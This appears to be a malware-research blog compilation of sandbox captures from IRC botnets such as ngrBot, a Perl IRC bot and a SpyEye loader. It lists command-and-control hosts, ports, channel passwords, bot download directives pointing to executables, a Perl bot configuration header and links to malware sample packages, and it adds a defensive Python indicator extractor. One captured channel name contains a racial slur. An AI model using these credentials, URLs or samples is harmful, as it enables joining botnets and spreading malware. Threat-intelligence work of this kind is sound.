Resolved: [update.jebac.net] to [212.7.214.129]
Resolved: [update.jebac.net] to [212.7.203.231]

update.jebac.net    212.7.214.129
api.wipmania.com    199.15.234.7
data.fuskbugg.se    83.233.33.6

Download URLs:
http://199.15.234.7/ (api.wipmania.com)
http://83.233.33.6/skalman02/4e28ae2064f07_av.txt (data.fuskbugg.se)

C&C Server: 212.7.214.129:1866
Server Password:
Username: jbxznyp
Nickname: n{DE|XPa}jbxznyp
Channel: #!hot! (Password: ngrBot)
Channel topic: :.http.int 3 .msn.int 2 .http.set omfg!!# LOL!#!* http://www.designthreadz.com/facebook-pic-#####-JPEG .msn.set lolol*!!# foto?!# http://www.designthreadz.com/facebook-pic-#####-JPEG .mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n

The topic is the ngrBot command set pushed to every bot on join: .http.set and .msn.set carry the lure text and link used for HTTP and MSN spreading, .http.int and .msn.int their intervals, and .mdns points at the DNS-modification list (here the "_av.txt" file) the bot loads.
72.20.30.30 (IRC botnet hosted in United States, Staminus Communications)

Remote Host      Port Number
72.20.30.30      20

NICK NEW[XX][XP]9032364432
USER 9032 "" "TsGh" :9032
MODE NEW[XX][XP]9032364432
JOIN #galla
PONG :irc.priv8net.com
Now talking in #galla
Topic On: [ #galla ] [ . ]
Topic By: [ cakita ]
NICK NEW[XX][XP]0445084461
USER 0445 "" "TsGh" :0445
MODE NEW[XX][XP]0445084461
JOIN #Mcl
PONG :irc.priv8net.com

Hosting info: http://whois.domaintools.com/72.20.30.30
irc.priv8.in (Linux bots hosted in United States, Network Operations Center Inc)

Resolved: [irc.priv8.in] to [96.9.170.253]

Configuration header of the Perl IRC bot:

my $processo = '[httpd]';                  # fake process name shown in ps
my $linas_max = '4';
my $sleep = '6';
my $cmd = "[PHP-SHELL]";
my $id = "http://www.cricermenate.it/id.txt?";
my @adms = ("chK_");                       # admin nick(s) allowed to issue commands
my @canais = ("#xcr3w");                   # channel(s) to join
my @nickname = ("xcR3w-".int(rand(1-000))); # as captured: 1-000 is 1, so rand(1) always gives 0 here
my $nick = $nickname[rand scalar @nickname];
my $ircname = 'xcr3w';
chop (my $realname = 'bukan sesiapa');     # "nobody" in Malay/Indonesian
$servidor = 'irc.priv8.in' unless $servidor; # C&C server
my $porta = '6667';                         # C&C port

Hosting info: http://whois.domaintools.com/96.9.170.253
SpyEye Loader v1.3.41
From France with love, another pwnage from Xylitol. Found these samples in a hacker's FTP. Remember, this is only for analysis purposes. Sorry, I removed the builder for security purposes.

Download: http://9598d5df.tubeviral.com
46.105.164.74 (IRC botnet hosted in France, OVH Systems)

Remote Host      Port Number
46.105.164.74    2109
46.105.164.74    8782

NICK [USA|635435]
USER 8770 "" "lol" :8770
JOIN #moo
PONG :Threat-Expert.net
NICK {iNF-00-USA-XP-COMP-7188}
JOIN #hold nigger
PONG Threat-Expert.net
USER blaze * 0 :COMP

Hosting info: http://whois.domaintools.com/46.105.164.74
64.34.200.181 (IRC botnet hosted in United States, Newhall, ServerBeach)

Remote Host       Port Number
195.122.131.13    80
204.0.5.41        80
63.135.80.224     80
63.135.80.46      80
64.34.200.181     1234

PASS xxx
NICK NEW-[USA|00|P|99411]
USER XP-0024 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|99411] -ix
JOIN #!nw! test
PONG 22
MOTD

Hosting info: http://whois.domaintools.com/64.34.200.181
208.117.34.213 (ngrBot hosted in United States, Laird Hill, Steadfast Networks)

Remote Host       Port Number
199.101.133.144   80
199.101.133.25    80
199.15.234.7      80
208.117.34.213    1888

PASS ngrBot
PRIVMSG #XP :[d="http://dc387.4shared.com/download/k1pyhC72/robertiniii.exe" s="81920 bytes"]
Executed file "C:\Documents and Settings\UserName\Application Data\2.exe" - Download retries: 0
NICK n{US|XPa}mgycnpm
USER mgycnpm 0 0 :mgycnpm
JOIN ##center 1963.g3rb3rs1t0.3691
JOIN #XP
JOIN #US
PRIVMSG #XP :[d="http://dc355.4shared.com/download/dPl-t_0P/fdbfdf542.exe" s="167936 bytes"]
Updated bot file "C:\Documents and Settings\UserName\Application Data\Ldxaxl.exe"
bugazi.zapto.org (IRC botnet hosted in United Kingdom, Maidenhead, Simply Transit Ltd)

bugazi.zapto.org DNS_TYPE_A 213.229.78.226

Remote Host      Port Number
213.229.78.226   1244

Channels: 4 channels formed
Clients: I have 325 clients and 0 servers
Local users: Current Local Users: 325 Max: 550
Global users: Current Global Users: 325 Max: 550
NICK new[iRooT-XP-USA]557688
USER 1754 "" "TsGh" :1754
PONG :65FDE65C
JOIN #bugazi# aalbaklub1
PONG :HTTP1.4

Hosting info: http://whois.domaintools.com/213.229.78.226
78.47.197.2 (IRC botnet hosted in Germany, Potsdam, Hetzner Online AG)

Remote Host     Port Number
199.15.234.7    80
78.47.197.2     7200

PASS cheese (or PASS gBot)
NICK New{US-XP-x86}3313868
USER 9317 "" "9130" :25529
MODE New{US-XP-x86}3313868 3qUu
JOIN #Erection#
NICK n{US|XPa}wdvgswy
USER wdvgswy 0 0 :wdvgswy
JOIN #nig# cheese
JOIN #gBot# Channelisr00t

Hosting info: http://whois.domaintools.com/78.47.197.2
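The sandbox captures in the entries above (72.20.30.30, 46.105.164.74, 64.34.200.181, 208.117.34.213, bugazi.zapto.org, 78.47.197.2) all share one shape: a host/port table followed by the bot's IRC registration (PASS, NICK, USER, JOIN with channel key) run together on one line, plus, for ngrBot, download directives of the form d="url" s="size". The following Python is an added example and not code from these posts; it splits such a transcript back into commands and pulls out the indicators an analyst would block or hunt on. The two sample transcripts are constructed from the 64.34.200.181 and 208.117.34.213 captures; the assumption that tcp/80 contacts are geo-lookup and payload fetches rather than the IRC server, the digit-collapsing nick template, and all field names are this example's own.

```python
"""Extract IRC C&C indicators from sandbox network transcripts (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# "ip port" pairs from the sandbox's Remote Host / Port Number table.
HOST_PORT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")
# The sandbox runs client commands together on one line; split before each keyword.
CMD_SPLIT = re.compile(r"\s+(?=(?:PASS|NICK|USER|MODE|JOIN|PONG|PRIVMSG|MOTD)\b)")
# ngrBot download directive as seen in PRIVMSG/topic: [d="url" s="81920 bytes"]
DOWNLOAD = re.compile(r'd="(https?://[^"\s]+)"\s+s="([^"]+)"')
DIGITS = re.compile(r"\d+")

# Constructed from the page's captures (not a new capture).
SAMPLE_NW = (
    "Remote Host Port Number 195.122.131.13 80 204.0.5.41 80 63.135.80.224 80 "
    "63.135.80.46 80 64.34.200.181 1234 PASS xxx NICK NEW-[USA|00|P|99411] "
    "USER XP-0024 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|99411] -ix JOIN #!nw! test PONG 22 MOTD"
)
SAMPLE_NGRBOT = (
    "Remote Host Port Number 199.101.133.144 80 199.101.133.25 80 199.15.234.7 80 "
    "208.117.34.213 1888 PASS ngrBot "
    'PRIVMSG #XP :[d="http://dc387.4shared.com/download/k1pyhC72/robertiniii.exe" s="81920 bytes"] '
    "NICK n{US|XPa}mgycnpm USER mgycnpm 0 0 :mgycnpm JOIN ##center 1963.g3rb3rs1t0.3691 "
    "JOIN #XP JOIN #US"
)


@dataclass
class IrcBotSession:
    cnc_candidates: List[str] = field(default_factory=list)          # ip:port not on tcp/80 (assumption)
    password: Optional[str] = None                                   # PASS sent before NICK
    nicks: List[str] = field(default_factory=list)
    users: List[str] = field(default_factory=list)                   # first USER argument
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> join key
    downloads: List[Tuple[str, str]] = field(default_factory=list)   # (url, size)


def nick_template(nick: str) -> str:
    """Collapse digit runs so every bot of one family yields the same template."""
    return DIGITS.sub("<n>", nick)


def parse_transcript(text: str) -> IrcBotSession:
    s = IrcBotSession()
    for ip, port in HOST_PORT.findall(text):
        # Assumption: tcp/80 in these captures is the geo-lookup / payload fetch, not the C&C.
        if port != "80":
            s.cnc_candidates.append(f"{ip}:{port}")
    for chunk in CMD_SPLIT.split(text):
        parts = chunk.split()
        if not parts:
            continue
        cmd, args = parts[0], parts[1:]
        if cmd == "PASS" and args:
            s.password = args[0]
        elif cmd == "NICK" and args:
            s.nicks.append(args[0])
        elif cmd == "USER" and args:
            s.users.append(args[0])
        elif cmd == "JOIN" and args:
            # "JOIN #chan key": without the key you cannot join and read the topic.
            s.channels[args[0]] = args[1] if len(args) > 1 else None
        elif cmd == "PRIVMSG":
            s.downloads.extend(DOWNLOAD.findall(chunk))
    return s


def to_iocs(s: IrcBotSession) -> List[str]:
    """One indicator per line, ready for a blocklist or a ticket."""
    out = [f"cnc {c}" for c in s.cnc_candidates]
    if s.password:
        out.append(f"pass {s.password}")
    out += [f"nick {n} template={nick_template(n)}" for n in s.nicks]
    out += [f"channel {c} key={k or '-'}" for c, k in s.channels.items()]
    out += [f"download {u} ({sz})" for u, sz in s.downloads]
    return out


if __name__ == "__main__":
    for sample in (SAMPLE_NW, SAMPLE_NGRBOT):
        print("\n".join(to_iocs(parse_transcript(sample))), end="\n\n")
```

The split-on-keyword approach is deliberately forgiving: sandbox commentary such as "Executed file ..." that the report interleaves with the protocol text simply ends up at the tail of the preceding command's chunk, and PONG/MODE chunks are parsed but ignored. The nick template is what makes captures from different sandboxes comparable: NEW-[USA|00|P|99411] and NEW-[USA|00|P|12345] collapse to the same string, while the ngrBot style n{US|XPa}mgycnpm (random letters, no digits) is left as-is.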
Around 35 MB of malware samples

Here again with another package of different malware. Download: http://adf.ly/2QFHX